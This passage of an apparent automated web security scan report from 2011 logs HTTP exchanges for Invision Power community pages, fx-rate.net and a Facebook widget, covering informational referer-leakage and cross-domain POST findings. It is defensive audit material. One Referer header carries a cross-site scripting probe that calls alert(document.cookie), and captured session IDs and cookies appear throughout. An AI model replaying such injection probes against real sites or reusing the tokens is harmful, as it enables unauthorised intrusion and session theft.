Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568; cforums_session_id=8d464692f5305d92adc7b346c33d132b

Response 1

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:25:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=26ff862de5849e7791c810b6f5c1892d; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 22:25:55 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:25:56 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NbOuBVwwaIAHBw%2C%2C; expires=Thu, 02-Feb-2012 22:25:56 GMT; path=/; domain=community.invisionpower.com
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 64187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<![CDATA[
       /* ---- URLs ---- */
       ipb.vars['base_url']            = 'http://community.invisionpower.com/index.php?s=26ff862de5849e7791c810b6f5c1892d&';
       ipb.vars['board_url']            = 'http://community.invisionpower.com';
       ipb.vars['loading_img']        = 'http://cdn.invisionpower.com/public/style_images/master/loading.gif';
       ipb.vars['active_app']            = 'forums';
       ipb.vars['upload_url']            = 'http://cdn.invisionpower.com/uploads';
       /* ---- Member ---- */
       ipb.vars['member_id']            = parseInt( 0 );
       ipb.vars['is_supmod']            = parseInt( 0 );
       ipb.vars['is_admin']            = parseInt( 0 );
       ipb.vars['secure_hash']        = '880ea6a14ea49e853634fbdc5015a024';
       ipb.vars['session_id']            = '26ff862de5849e7791c810b6f5c1892d';
       ipb.vars['can_befriend']        = true;
       ipb.vars['twitter_id']            = 0;
       ipb.vars['fb_uid']                = 0;
       /* ---- cookies ----- */
       ipb.vars['cookie_id']            = 'cforums_';
       ipb.vars['cookie_domain']        = 'community.invisionpower.com';
       ipb.vars['cookie_path']            = '/';
       /* ---- Rate imgs ---- */
       ipb.vars['rate_img_on']            = 'http://cdn.invisionpower.com/public/style_images/master/bullet_star.png';
       ipb.vars['rate_img_off']        = 'http://cdn.invisionpower.com/public/style_images/master/bullet_star_off.png';
       ipb.vars['rate_img_rated']        = 'http://cdn.invisionpower.com/public/style_images/master/bullet_star_rated.png';
       /* ---- Uploads ---- */
       ipb.vars['swfupload_swf']        = 'http://community.invisionpower.com/public/js/3rd_party/swfupload/swfupload.swf';
       ipb.vars['swfupload_enabled']    = true;
       ipb.vars['use_swf_upload']        = ( '' == 'flash' ) ? true : false;
       ipb.vars['swfupload_debug']        = false; /* SKINNOTE: Turn off for production */
       /* ---- other ---- */
       ipb.vars['live_search_limit']    = 4;
       ipb.vars['highlight_color']        = "#ade57a";
       ipb.vars['charset']                = "iso-8859-1";
       ipb.vars['use_rte']                = 1;
       ipb.vars['image_resize']        = 1;
       ipb.vars['image_resize_force'] = 650;
       ipb.vars['seo_enabled']            = 1;
       
       ipb.vars['seo_params']            = {"start":"-","end":"\/","varBlock":"\/page__","varSep":"__"};
       
       /* Templates/Language */
       ipb.templates['ajax_loading']    = "<div id='ajax_load
...[SNIP]...

Request 2

GET /topic/330971-ipnexus-113-released/page__pid__2073390 HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568; cforums_session_id=8d464692f5305d92adc7b346c33d132b

Response 2

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:26:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=5b6ae8c0f04234449824442e45757b59; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 22:26:11 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:26:12 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1N7KuBVwwaHwHBQ%2C%2C; expires=Thu, 02-Feb-2012 22:26:12 GMT; path=/; domain=community.invisionpower.com
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 64177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<![CDATA[
       /* ---- URLs ---- */
       ipb.vars['base_url']            = 'http://community.invisionpower.com/index.php?s=5b6ae8c0f04234449824442e45757b59&';
       ipb.vars['board_url']            = 'http://community.invisionpower.com';
       ipb.vars['loading_img']        = 'http://cdn.invisionpower.com/public/style_images/master/loading.gif';
       ipb.vars['active_app']            = 'forums';
       ipb.vars['upload_url']            = 'http://cdn.invisionpower.com/uploads';
       /* ---- Member ---- */
       ipb.vars['member_id']            = parseInt( 0 );
       ipb.vars['is_supmod']            = parseInt( 0 );
       ipb.vars['is_admin']            = parseInt( 0 );
       ipb.vars['secure_hash']        = '880ea6a14ea49e853634fbdc5015a024';
       ipb.vars['session_id']            = '5b6ae8c0f04234449824442e45757b59';
       ipb.vars['can_befriend']        = true;
       ipb.vars['twitter_id']            = 0;
       ipb.vars['fb_uid']                = 0;
       /* ---- cookies ----- */
       ipb.vars['cookie_id']            = 'cforums_';
       ipb.vars['cookie_domain']        = 'community.invisionpower.com';
       ipb.vars['cookie_path']            = '/';
       /* ---- Rate imgs ---- */
       ipb.vars['rate_img_on']            = 'http://cdn.invisionpower.com/public/style_images/master/bullet_star.png';
       ipb.vars['rate_img_off']        = 'http://cdn.invisionpower.com/public/style_images/master/bullet_star_off.png';
       ipb.vars['rate_img_rated']        = 'http://cdn.invisionpower.com/public/style_images/master/bullet_star_rated.png';
       /* ---- Uploads ---- */
       ipb.vars['swfupload_swf']        = 'http://community.invisionpower.com/public/js/3rd_party/swfupload/swfupload.swf';
       ipb.vars['swfupload_enabled']    = true;
       ipb.vars['use_swf_upload']        = ( '' == 'flash' ) ? true : false;
       ipb.vars['swfupload_debug']        = false; /* SKINNOTE: Turn off for production */
       /* ---- other ---- */
       ipb.vars['live_search_limit']    = 4;
       ipb.vars['highlight_color']        = "#ade57a";
       ipb.vars['charset']                = "iso-8859-1";
       ipb.vars['use_rte']                = 1;
       ipb.vars['image_resize']        = 1;
       ipb.vars['image_resize_force'] = 650;
       ipb.vars['seo_enabled']            = 1;
       
       ipb.vars['seo_params']            = {"start":"-","end":"\/","varBlock":"\/page__","varSep":"__"};
       
       /* Templates/Language */
       ipb.templates['ajax_loading']    = "<div id='ajax_load
...[SNIP]...

14.4. http://fx-rate.net/fx-rates.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fx-rate.net
Path:   /fx-rates.php

Request 1

GET /fx-rates.php?label_type=country_name&currency=HKD&length=short HTTP/1.1
Host: fx-rate.net
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:32:41 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4116


var form_content = '<center>    <style>    .WNtopmenu2 {width: 187px; line-height:17px; background-color: #eeeeee;border-collapse:collapse;}    .WNrow1 {background: #ffffff;}    .WNcol1a {width: 75%; font-family: verdana; font-size:12px; text-align:left; padding-left: 2px;}    .WNcol2a {font-family: verdana; font-size:12px; text-align:right;}    .WNcol1a a { text-decoration:none;color:#000055;font-weight:normal;}    .WNcol2a a {text-decoration:none;color:#000055;font-weight:normal;}    .WNrow2 {background-color: #eeeeee;}    .WNcol1 {width: 75%; font-family: verdana; font-size:12px; text-align:left; padding-left: 2px;}    .WNcol2 {font-family: verdana; font-size:12px; text-align:right; }    .WNcol1 a { text-decoration:none;color:#000055;font-weight:normal}    .WNcol2 a { text-decoration:none;color:#000055;font-weight:normal}    </style><table class="WNtopmenu2"><tr xmlns:fo="http://www.w3.org/1999/XSL/Format" class="WNrow2"><td colspan="2" class="WNcol2"><a style="color:black; text-decoration:none" href="http://fx-rate.net/HKD/widget/"><b>in HKD</b></a></td></tr><tr class="WNrow1"><td class="WNcol1a"><a href="http://fx-rate.net/AUD/widget/" style="color:black; text-decoration:none" title="Australian Dollar" alt="Australian Dollar"><img border="" style="margin:0;padding:0;border:0" width="16" height="11" title="Australian Dollar" src="http://fx-rate.net//images/countries/au.png"> &nbsp;&nbsp;Australia</a></td><td class="WNcol2a"><a href="http://fx-rate.net/HKD/widget/" style="color:black; text-decoration:none">7.87</a></td></tr><tr class="WNrow2"><td class="WNcol1"><a style="color:black; text-decoration:none" href="http://fx-rate.net/CHF/widget/" title="Swiss Franc" alt="Swiss Franc"><img border="" style="margin:0;padding:0;border:0" width="16" height="11" title="Swiss Franc" src="http://fx-rate.net//images/countries/ch.png"> &nbsp;&nbsp;Switzerland</a></td><td class="WNcol2"><a href="http://fx-rate.net/HKD/widget/" style="color:black; text-decoration:none">8.33</a></td></tr><tr class="WNrow1"><
...[SNIP]...

Request 2

GET /fx-rates.php?label_type=country_name&currency=HKD&length=short HTTP/1.1
Host: fx-rate.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:32:44 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 160

document.write("You have exceeded the widget quota for a private intranet webpage. Check <a href=\"http://fx-rate.net/getwidget/#conditions\">fx-rate.net</a>");

14.5. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?action=like&api_key=167973672925&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df39d5d5ad%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff27f92d41%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 22:26:30 GMT
Content-Length: 10591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d49da16914696099685857" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>IP.Nexus 1.1.3 Released</b>.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=community.invisionpower.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></div></div></td></tr></table></div><script type="text/j
...[SNIP]...

Request 2

GET /plugins/like.php?action=like&api_key=167973672925&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df39d5d5ad%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff27f92d41%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 22:28:01 GMT
Content-Length: 10361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d49da714948b9f28460342" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>IP.Nexus 1.1.3 Released</b>.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></div></div></td></tr></table></div><script type="text/javascript">
Env={module:"like_widget",impid:"0765c6b2",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_r
...[SNIP]...

15. Cross-domain POST  previous  next
There are 46 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


15.1. http://community.invisionpower.com/resources/documentation/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /resources/documentation/index.html HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=16bbd6a3efa6f42a30f8d5c0d22a2d10; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:12 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32760

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.2. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/installation-r17

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=26a6b17494dde8cfa26a90ef195a3c6d; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjS3BhJGlmZmlobmBmbWtVwwUA4GMg%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34380

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.3. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=23b36da2676ec4b7a7eada851882031e; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:33 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:33 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU0sc60MjSyNDOzNDQ3NLauBVwwVbgGYg%2C%2C; expires=Fri, 03-Feb-2012 00:08:33 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33618

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.4. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=52c21975d801317348f94128ddfa4737; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MrSwBhJGlmZmlobmBubWtVwwUCEGNA%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33840

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.5. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
